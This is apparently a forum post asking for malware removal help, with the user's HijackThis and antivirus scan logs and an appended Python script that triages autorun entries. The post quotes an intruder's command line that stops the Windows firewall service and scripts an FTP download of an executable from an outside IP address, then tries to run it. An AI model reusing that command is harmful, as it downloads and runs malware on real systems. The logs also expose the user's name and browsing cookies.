Malware and Spyware, PC Malware Issues
moxy1975
post Oct 7 2007, 02:27 AM
OS: XP



Hi

I have followed your instructions for removal of Malware and Spyware on my pc. However, the panda soft scan revealed a number of spyware/malware items which were not removed. These had not been picked up by Norton, Spybot D&D, Ad-Aware, AVG, SuperAV or ATF Cleaner.

This process was started as I received a prompt from Windows Security to run a file called printer.exe 0E099EB1.pf. Norton also picked this up and recommended I install. However, as the publisher was unsigned, I decided to check on the web first what the file is. I read lots about it being associated with Malware and spyware.

In addition, I have suffered attacks over the last few months with someone running a script remotely on my pc which opens cmd.exe and enters code in dos, e.g.:

> ^C
> C:\Documents and Settings\Richard Moxham>
> C:\Documents and Settings\Richard Moxham>*t%\system32\cd. stop
> SharedAccess &echo
> open 85.250.33.92 62113 >> ij &echo user t g >> ij &echo get oc.exe

> >> ij &echo
> bye >> ij &ftp -n -v ij&oc.et start SharedAccess &exit
> The system cannot find the path specified.
> Unknown host ij.
> ftp>
> ftp>*
> ftp>

When I have searched for these files, they do not appear on my pc. Or the cmd window says file not known/found.

I have a service on my pc called VNC which allows remote control of my pc by IT staff at the company I work for when I have database related IT issues (I work remotely). They confirm none of these entries were by them.

I believe that the Printer.exe file was downloaded by such a cmd prompt instruction.

Meanwhile, my PC has been running slowly and I was, until I removed it from the start list, prompted to install the file.

I attach the various logs you requested:

HIJACK THIS LOG

Logfile of HijackThis v1.99.1
Scan saved at 09:50:16, on 07/10/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Multimedia Keyboard Driver\PS2USBKbdDrv.exe
C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Lavasoft\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Lavasoft\SUPERAntiSpyware.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\NETGEAR\NETGEAR MA521 Adapter\wlancfg5.exe
C:\Program Files\NETGEAR\WG111v2 Configuration Utility\RtlWake.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\OpenOffice.org 2.2\program\soffice.exe
C:\Program Files\OpenOffice.org 2.2\program\soffice.BIN
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system32\dllhost.exe
C:\PROGRA~1\MICROS~2\Office\OUTLOOK.EXE
C:\WINDOWS\system32\msdtc.exe
C:\WINDOWS\msagent\AgentSvr.exe
C:\Program Files\Lavasoft\Hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton AntiVirus\osCheck.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [WireLessKeyboard] C:\Program Files\Multimedia Keyboard Driver\StartAutorun.exe PS2USBKbdDrv.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\RunServices: [Hp_Service] printer.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Lavasoft\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\Lavasoft\SUPERAntiSpyware.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Netvision Cable Connect.url
O4 - Startup: OpenOffice.org 2.2.lnk = C:\Program Files\OpenOffice.org 2.2\program\quickstart.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: MA521 Configuration Utility.lnk = C:\Program Files\NETGEAR\NETGEAR MA521 Adapter\wlancfg5.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WG111v2 Smart Wizard Wireless Setting.lnk = ?
O8 - Extra context menu item: Translate with &Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Translate.htm
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {4E62C4DE-627D-4604-B157-4B7D6B09F02E} (AccountTracking Profile Manager Class) - https://moneymanager.egg.com/Pinsafe/accounttracking.cab
O16 - DPF: {6A344D34-5231-452A-8A57-D064AC9B7862} (Symantec Download Manager) - https://webdl.symantec.com/activex/symdlmgr.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1180266682263
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - https://fpdownload.macromedia.com/get/shock...ash/swflash.cab
O16 - DPF: {E10869DE-C0E2-40E1-B247-EE6EB3921F68} (NetisClient Class) - http://archive.globes.co.il/ENGLISH/NetisU...netisclient.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{91E6A3EF-84C3-4C95-AA50-1C7D67E76F1F}: NameServer = 212.143.212.143 194.90.1.5
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\Lavasoft\SASWINLO.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Symantec IS Password Validation (ISPwdSvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\isPwdSvc.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: Symantec Core LC - Unknown owner - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)



SUPERANTIVIRUS LOG

SUPERAntiSpyware Scan Log
Generated 10/06/2007 at 04:09 AM

Application Version : 3.6.1000

Core Rules Database Version : 3319
Trace Rules Database Version: 1320

Scan type : Complete Scan
Total Scan Time : 03:14:55

Memory items scanned : 632
Memory threats detected : 0
Registry items scanned : 5592
Registry threats detected : 0
File items scanned : 84471
File threats detected : 70

Adware.Tracking Cookie
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@bs.serving-sys[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@atdmt[2].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@tacoda[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@serving-sys[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@overture[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.accelerator-media[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.bannerconnect[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.msn.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adinterax[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adopt.specificclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.addynamix[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.ak.facebook[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.doctors.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.ft[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.keshet-i[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.pointroll[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.telegraph.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.xtra.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adultadworld[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@archant.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@azjmp[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@burstnet[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@casalemedia[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@cnn.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter.credo[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter2[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter3.sextracker[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@dealtime.co[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@deloitte.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@dmedia.securest[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-acdsystems.hitbox[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-ati.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-independent.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-j2.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-logantod.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-systran.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@fastclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@gostats[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@mckinseyknowledge.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@metacafe.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@microsoftwga.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@msnisrael.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@mysextour[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@onlyteenblowjobs[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@paycounter[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@perf.overture[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@pro.imedia.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@propertyfinderltd.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@rocku.adbureau[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@roiservice[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@semdirector.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@server.iad.liveperson[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@sonyeurope.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@specificclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@stats.endsleigh.co[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@teenagewhores[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@track.omguk[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@tsahi.sitetracker[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@waterfrontmedia.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@windowsmedia[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.amateurporn4free[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.burstnet[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.clickmanage[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.mysextour[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.travelbyclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.windowsmedia[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.xxxmofo[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@xiti[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@xxxmofo[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@zedo[1].txt


Panda Soft Active Scan Log


Incident Status Location

Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@overture[1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\restart.exe
Virus:Bck/Bifrose.AYB Disinfected C:\WINDOWS\addons\Wuauclt.exe
Spyware:Cookie/NewMedia Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@anm.co[1].txt
Spyware:Cookie/GangbangSquad Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@gangbangsquad[2].txt
Spyware:Cookie/GangbangSquad Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.gangbangsquad[1].txt
Potentially unwanted tool:Application/Processor Not disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\restart.exe
Virus:Trj/SpamtaLoad.DW Disinfected Personal Folders\Deleted Items\Mail server report.\Update-KB656-x86.zip[Update-KB656-x86.exe]
Virus:Trj/SpamtaLoad.DW Disinfected Personal Folders\Deleted Items\Mail server report.\Update-KB5531-x86.zip[Update-KB5531-x86.exe]


Looking at a lot of the cookies, this was prior usage on old win2000 profile which was used by the whole family (E: Drive). Should I perhaps format this as it is no longer used/working following an error with the system32 file?
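A triage pass over the HijackThis log in the post above, as an added example that is not part of the original post and not HijackThis's own logic. It parses the O4 (registry autorun) and O23 (service) lines and lists the entries a reviewer would look at first; the three review rules (autorun command without a directory, "Unknown owner", "(file missing)") are assumptions chosen for this illustration, and the function names are hypothetical.

```python
import ntpath
import re

# Lines copied from the HijackThis log in the post above (subset).
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\RunServices: [Hp_Service] printer.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Netvision Cable Connect.url
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Symantec Core LC - Unknown owner - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
"""

# O4 registry autoruns: "O4 - <key>: [<value name>] <command>"
O4_RE = re.compile(r"^O4 - (HK(?:LM|CU)\\\.\.\\\w+): \[(.+?)\] (.+)$")
# O23 services: "O23 - Service: <name> - <owner> - <path>"
O23_RE = re.compile(r"^O23 - Service: (.+?) - (.+?) - (.+)$")
# Executable part of a command: a quoted path, or text up to the first
# program extension (unquoted paths in the log may contain spaces).
EXE_RE = re.compile(r'^"([^"]+)"|^(.+?\.(?:exe|com|bat|cmd|scr|pif))\b', re.I)


def executable_of(command):
    """Return the program path from an autorun command line."""
    m = EXE_RE.match(command)
    if m:
        return m.group(1) or m.group(2)
    return command.split()[0]


def triage(log_text):
    """Return (location, entry name, [reasons]) for entries worth a manual look."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        reasons = []
        m = O4_RE.match(line)
        if m:
            location, name, command = m.groups()
            # A bare file name is resolved through the search path at logon,
            # so the log alone does not show which file on disk will run.
            if not ntpath.dirname(executable_of(command)):
                reasons.append("autorun command has no directory")
        else:
            m = O23_RE.match(line)
            if not m:
                continue  # startup-folder shortcuts and other sections are skipped
            name, owner, path = m.groups()
            location = "service"
            if owner == "Unknown owner":
                reasons.append("HijackThis reported an unknown owner")
            if path.endswith("(file missing)"):
                reasons.append("HijackThis reported the file as missing")
        if reasons:
            findings.append((location, name, reasons))
    return findings


if __name__ == "__main__":
    for location, name, reasons in triage(SAMPLE_LOG):
        print(f"{location:22} {name:32} {'; '.join(reasons)}")
```

A flagged entry is a prompt to check the file on disk, not a verdict: the same rules also pick up the Symantec and VNC services in this log.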